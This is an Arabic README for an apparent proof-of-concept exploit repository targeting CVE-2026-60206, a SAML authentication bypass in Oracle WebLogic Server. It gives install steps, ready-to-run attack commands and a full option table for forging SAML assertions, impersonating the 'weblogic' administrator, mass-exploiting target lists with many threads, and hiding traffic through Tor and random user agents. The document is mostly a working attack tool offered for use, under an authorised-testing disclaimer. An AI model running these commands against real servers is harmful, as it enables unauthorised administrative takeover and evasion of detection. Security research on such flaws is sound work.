
تحليل تقني وإثبات مفهوم لثغرة CVE-2026-60206، وهي ثغرة حرجة لتجاوز المصادقة عبر SAML في Oracle WebLogic Server.
يوفر هذا المستودع كود استغلال لإثبات المفهوم لثغرة CVE‑2026‑60206، وهي ثغرة حرجة لتجاوز المصادقة في تنفيذ SAML الخاص بـ Oracle WebLogic Server. تسمح هذه الثغرة لمهاجم بعيد منخفض الصلاحيات باختراق الخادم بالكامل عن طريق تزوير تأكيدات SAML.
⚠️ إخلاء مسؤولية: هذه الأداة مخصصة للبحث والاختبار الأمني المصرَّح به فقط. استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. لا يتحمل المؤلفون أي مسؤولية عن إساءة الاستخدام.
تؤثر CVE‑2026‑60206 على المكوّن الأساسي (Core) في Oracle WebLogic Server. يعود أصل الثغرة إلى المعالجة غير السليمة للمصادقة في تنفيذ بروتوكول SAML. تتيح نواقل هجوم متعددة — مثل التفاف توقيع XML (XSW)، وقبول التأكيدات غير الموقعة، والتلاعب بـ NameID، وتجاوز قيود الجمهور/الشروط — للمهاجم انتحال شخصية مستخدمين عشوائيين (مثل: weblogic) والحصول على وصول إداري.
الإصدارات المتأثرة:
ينفّذ إثبات المفهوم (PoC) نواقل الهجوم التالية:
WantAssertionsSigned مفعَّلاً).AudienceRestriction أو تعديله لتوسيع النطاق.NotBefore/NotOnOrAfter لتجاوز فحوصات الصلاحية.all, unsigned, xsw, nameid, audience, conditions, combo أو replay.-l).-r).httpx تلقائيًا إذا كان مثبتًا، ويعود إلى requests (HTTP/1.1) كخيار احتياطي.--save-payloads).-c / --check) – تحديد سريع لما إذا كان الهدف عرضة للثغرة (بدون استغلال).git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt
مطلوب: requests, urllib3
اختياري (يحسّن الوظيفة):
httpx – لدعم HTTP/2lxml – لتحسين تحليل SAMLsignxml, cryptography – للتعامل مع التوقيعات (غير مطلوبة للاستغلال)python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin
python CVE-2026-60206.py -l targets.txt -o results.json
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c
| Flag | الوصف |
|---|---|
-h, --help | عرض رسالة المساعدة والخروج. |
--proxy PROXY | عنوان URL للوكيل (يُتجاوز بواسطة --tor إذا استُخدم). |
--no-verify | تعطيل التحقق من شهادة SSL. |
--cookie COOKIE | ملفات تعريف ارتباط الجلسة (مثل: name=value; name2=value2). |
--auth AUTH | بيانات اعتماد المصادقة الأساسية (USER:PASS). |
| Flag | الوصف |
|---|---|
-t, --target TARGET | عنوان URL لهدف واحد (مثل: https://host:7002). |
-l, --list LIST | ملف قائمة الأهداف للفحص الجماعي، أو عنوان URL واحد. |
-f, --file FILE | اسم مستعار لـ --list. |
| Flag | الوصف |
|---|---|
-r, --requestfile REQUESTFILE | تحميل طلب HTTP خام من ملف (يحل محل هجمات SAML). |
--method METHOD | طريقة HTTP التي سيتم استخدامها (للطلب الخام أو طلب واحد؛ الافتراضي: GET). |
--random-agent | استخدام User‑Agent عشوائي من القائمة المدمجة. |
-A, --user-agent USER_AGENT | قيمة مخصصة لترويسة User‑Agent. |
--tor | استخدام شبكة إخفاء الهوية Tor (SOCKS5 افتراضيًا). |
--tor-port TOR_PORT | منفذ وكيل Tor (الافتراضي: 9050). |
--tor-type {HTTP,SOCKS4,SOCKS5} | نوع وكيل Tor (الافتراضي: SOCKS5). |
--check-tor | التحقق من أن Tor يُستخدم بشكل صحيح (يخرج مع الحكم). |
--delay DELAY | التأخير بالثواني بين كل طلب. |
--timeout TIMEOUT | المهلة بالثواني (الافتراضي: 30). |
--retries RETRIES | عدد مرات إعادة المحاولة عند انتهاء المهلة/الأخطاء (الافتراضي: 3). |
--retry-on RETRY_ON | إعادة محاولة الطلب إذا تطابق محتوى الاستجابة مع نمط regex (مثل: 'captcha'). |
-dr, --disable-redirects | تعطيل تتبع عمليات إعادة توجيه HTTP. |
| Flag | الوصف |
|---|---|
-m, --mode {all,detect,unsigned,xsw,nameid,audience,conditions,combo,replay} | وضع الهجوم (الافتراضي: all). |
--detect | اكتشاف إصدار WebLogic وإعدادات SAML فقط (بدون هجوم). |
-c, --check | فحص سريع للثغرة (اكتشاف فقط، يخرج مع الحكم). |
-u, --user USER | المستخدم الهدف لانتحال شخصيته (الافتراضي: weblogic). |
--groups GROUPS | المجموعات التي ستُدرج في تأكيد SAML (الافتراضي: Administrators,Monitors). |
--issuer ISSUER | معرّف كيان المُصدِر (Issuer) في SAML. |
--audience AUDIENCE | معرّف كيان الجمهور (Audience) في SAML. |
--relay-state RELAY_STATE | معامل RelayState لإرسال SAML عبر POST. |
--base64 | ترميز استجابة SAML بترميز Base64 في POST. |
--extra-attrs [NAME=VALUE ...] | سمات SAML إضافية (مثل: role=admin). |
--replay-file REPLAY_FILE | مسار استجابة SAML ملتقطة لإعادة الإرسال. |
--save-payloads | حفظ حمولات SAML المولدة في ./payloads/. |
--continue-on-success | مواصلة الاختبار بعد نجاح الهجوم. |
-l):| Flag | الوصف |
|---|---|
--exploit | اختبار تأكيد SAML غير الموقّع (الافتراضي: اكتشاف فقط). |
-T, --threads THREADS | الخيوط المتزامنة (الافتراضي: 10). |
| Flag | الوصف |
|---|---|
-v, --verbose | زيادة مستوى التفصيل (مخرجات تصحيح). |
-q, --quiet | كتم المخرجات غير الأساسية. |
--list-modes | عرض جميع أوضاع الهجوم مع أوصافها ثم الخروج. |
-o, --output OUTPUT | كتابة تقرير JSON أو CSV إلى ملف. |
detectينفّذ اكتشاف الإصدار واستكشاف نقاط نهاية SAML. لا يتم إطلاق أي هجوم.